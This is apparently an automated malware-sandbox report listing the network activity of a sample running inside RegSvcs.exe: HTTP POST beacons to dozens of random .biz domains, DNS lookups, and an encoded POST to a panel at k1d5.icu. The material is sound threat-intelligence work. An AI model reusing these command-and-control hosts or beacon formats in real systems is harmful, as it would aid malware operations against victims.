              Source: global trafficHTTP traffic detected: POST /mbhdlepkeeimc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /osobbhwa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vcdqqdvbwhgvsi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /oajmbd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gbcstiuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /inonlcbojnu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /waxb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /icxil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rkcyrfbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /decjayv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /oflvinlq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cctwfdagfuqgkcrp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fysbuxlbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wfyiibhukdwvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rkobxpllgfpahuau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ej HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /pimlqcf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yxqtpqinac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /lakonfsatp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /prs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wnmeou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: GET /xg?usid=18&utid=30152701801 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww1.wxgzshna.biz
              Source: global trafficHTTP traffic detected: POST /blqtjaa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /shntjujahohucfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gsucnqsvdim HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,8_2_00418688
              Source: global trafficHTTP traffic detected: GET /cygwkoswoy?usid=18&utid=30152678086 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /b?usid=18&utid=30152678348 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /gedtsq?usid=18&utid=30152678479 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /en?usid=18&utid=30152678739 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /yhikx?usid=18&utid=30152687280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
              Source: global trafficHTTP traffic detected: GET /xrkixnpk?usid=18&utid=30152687444 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
              Source: global trafficHTTP traffic detected: GET /xg?usid=18&utid=30152701801 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww1.wxgzshna.biz
              Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
              Source: global trafficDNS traffic detected: DNS query: k1d5.icu
              Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
              Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
              Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
              Source: global trafficDNS traffic detected: DNS query: przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: zlenh.biz
              Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
              Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
              Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
              Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
              Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
              Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
              Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
              Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
              Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
              Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: ww7.fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: ww12.fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
              Source: global trafficDNS traffic detected: DNS query: deoci.biz
              Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
              Source: global trafficDNS traffic detected: DNS query: qaynky.biz
              Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
              Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
              Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
              Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
              Source: global trafficDNS traffic detected: DNS query: myups.biz
              Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
              Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
              Source: global trafficDNS traffic detected: DNS query: jpskm.biz
              Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
              Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
              Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
              Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
              Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
              Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
              Source: global trafficDNS traffic detected: DNS query: vyome.biz
              Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
              Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
              Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
              Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
              Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
              Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
              Source: global trafficDNS traffic detected: DNS query: esuzf.biz
              Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
              Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
              Source: global trafficDNS traffic detected: DNS query: brsua.biz
              Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
              Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
              Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
              Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
              Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
              Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
              Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
              Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
              Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
              Source: global trafficDNS traffic detected: DNS query: gcedd.biz
              Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
              Source: global trafficDNS traffic detected: DNS query: xccjj.biz
              Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
              Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
              Source: global trafficDNS traffic detected: DNS query: uaafd.biz
              Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
              Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
              Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
              Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
              Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
              Source: global trafficDNS traffic detected: DNS query: whjovd.biz
              Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
              Source: global trafficDNS traffic detected: DNS query: reczwga.biz
              Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
              Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
              Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
              Source: global trafficDNS traffic detected: DNS query: ywffr.biz
              Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
              Source: global trafficDNS traffic detected: DNS query: pectx.biz
              Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
              Source: global trafficDNS traffic detected: DNS query: banwyw.biz
              Source: global trafficDNS traffic detected: DNS query: muapr.biz
              Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
              Source: global trafficDNS traffic detected: DNS query: ww1.wxgzshna.biz
              Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
              Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
              Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
              Source: unknownHTTP traffic detected: POST /TP341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: k1d5.icuContent-Length: 101Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6c ea 26 66 97 46 14 e8 40 10 8b 31 11 8b 30 66 ef 47 11 8b 30 65 8b 30 63 8b 30 65 8b 30 60 8b 31 11 8b 30 66 e8 26 66 99 26 66 98 26 66 9a 46 70 9d 3b 17 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410l&fF@10fG0e0c0e0`10f&f&f&fFp;
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:36 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
